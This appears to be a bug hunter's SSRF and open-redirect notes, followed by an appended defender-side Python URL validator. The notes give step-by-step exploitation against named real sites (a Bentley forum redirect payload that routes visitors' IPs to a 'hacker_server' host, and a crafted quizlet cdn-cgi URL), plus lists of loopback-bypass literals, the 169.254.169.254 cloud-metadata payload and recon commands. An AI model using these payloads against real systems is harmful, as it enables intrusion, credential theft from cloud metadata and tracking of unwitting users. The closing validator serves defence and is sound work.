include public third-party systems, internal systems within the same organization,
or services available on the local loopback adapter of the application server
itself. Depending on the network architecture, this may expose highly vulnerable
internal services that are not otherwise accessible to external attackers. The
facility to generate an email to an arbitrary address is often intended application
behavior. But this is not necessarily the case, particularly in cases where the
destination address is not explicitly entered on-screen by the user.

Steps:

How the hacker will exploit this:

Go to https://communities.bentley.com/communities/other_communities/sign-in_assistance_and_web_services/f/cloud-and-web-services-forum/4547/bentley-download?tempkey=2199dab4-d0ba-4965-a445-0ac853b8d278

Reply to any post and in the payload add this as the source:

<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Refresh" content="5;url=https://www.google.com">
</head>
<body>
  <p>Sorry! We have moved! The new URL is: <a href="https://www.hacker_server.com">https://www.google.com</a></p>
  <p>You will be redirected to the new address in five seconds.</p>
  <p>If you see this message for more than 5 seconds, please click on the link above!</p>
</body>
</html>

Once the user clicks on google.com, the IP and logs will go via the Bentley server to
the hacker server.


SSRF
Server Side Request Forgery

IMP:

1. Do the exploit, then report
2. If only DNS interaction, then it is of no use
3. Write down each step

Detection of SSRF: HTTP

1. Burp Collaborator
2. Extension: Collaborator Everywhere

Exploits:
1. Port scanning
2. File over a port
3. Backend system scan/machine
4. SSRF to DoS
5. SSRF information disclosure
6. SSRF to aws metadata
7. SSRF to random escalation
8. Whitelist/Blacklist SSRF bypass

Tool: Waybackurls

Burp

Where ?

Headers
Add link
upload photo
insert URL
add website to bio
convert files

SSRF ?

https://target.com/user/profile?imageurl=https://burplink.net

https://clickjacker.io
https://document.online-convert.com/convert/docx-to-pdf

site.com/admin/ep/img?file=https://test.com/admin.png

IMP: Images: png, jpeg, jpg

look for : cdn-cgi

.
#
@

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://farm1.staticflickr.com.burp.net:80/21/29703429_17b4da0aef.jpg

https://web.archive.org/cdx/search/cdx?url=*.quizlet.com&output=text&fl=original&collapse=urlkey

======================

Backend

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

echo tomcat.tiler01.huygens.knaw.nl | gau | tee test-ssrf

127.0.0.1
127.0.1
127.1

0.0.0.0
0.0.0
0.0
0

[:]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++==

APIPA

Payloads
http://169.254.169.254/latest/
169.254.169.254/latest
https://169.254.169.254/latest/
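Added defender-side example, not part of these notes: one Python check that covers both the cdn-cgi parser tricks above (the "." suffix and "@" userinfo bypasses of an image-proxy allowlist) and the loopback / 0.0.0.0 / APIPA literals listed in this section. The allowlist and the attacker host names are constructed for the example; it shows the substring comparison such bypasses defeat next to a parse-then-compare version, and normalises the shorthand IP forms (127.1, 0, 0.0.0) without doing any DNS lookup.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist for this example: the only origin the image proxy may fetch from.
ALLOWED_HOSTS = {"farm1.staticflickr.com"}

def naive_is_allowed(url):
    """Substring check that the '@' and '.burp.net' tricks in the notes defeat:
    'does the URL mention an allowed host anywhere?'."""
    return any(h in url for h in ALLOWED_HOSTS)

def to_ip(host):
    """IP literal -> ip_address, or None for a DNS name (no lookup is done).
    inet_aton accepts the shorthand forms from the notes ('127.1', '0.0.0', '0')
    that ipaddress alone rejects."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_aton(host))
    except OSError:
        return None

def hardened_is_allowed(url):
    """Parse first, then compare the exact hostname. urlsplit().hostname drops
    userinfo ('allowed.com@evil'), the port and IPv6 brackets, so the '@' trick
    yields the real host and a '.burp.net' suffix no longer matches. IP literals
    are refused outright: a name allowlist must never admit 127.1 or 169.254.169.254."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return False
    if to_ip(host) is not None:
        return False
    return host in ALLOWED_HOSTS

def targets_internal_address(host):
    """True when a host literal points where the proxy must never fetch: loopback
    (incl. '127.1'), 0.0.0.0 (incl. '0'), link-local/APIPA such as 169.254.169.254,
    or RFC 1918 space. A DNS name needs this test on the address resolved at fetch time."""
    host = host.strip("[]").lower()
    if host == "localhost":
        return True
    ip = to_ip(host)
    return ip is not None and (ip.is_loopback or ip.is_unspecified
                               or ip.is_link_local or ip.is_private)
```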
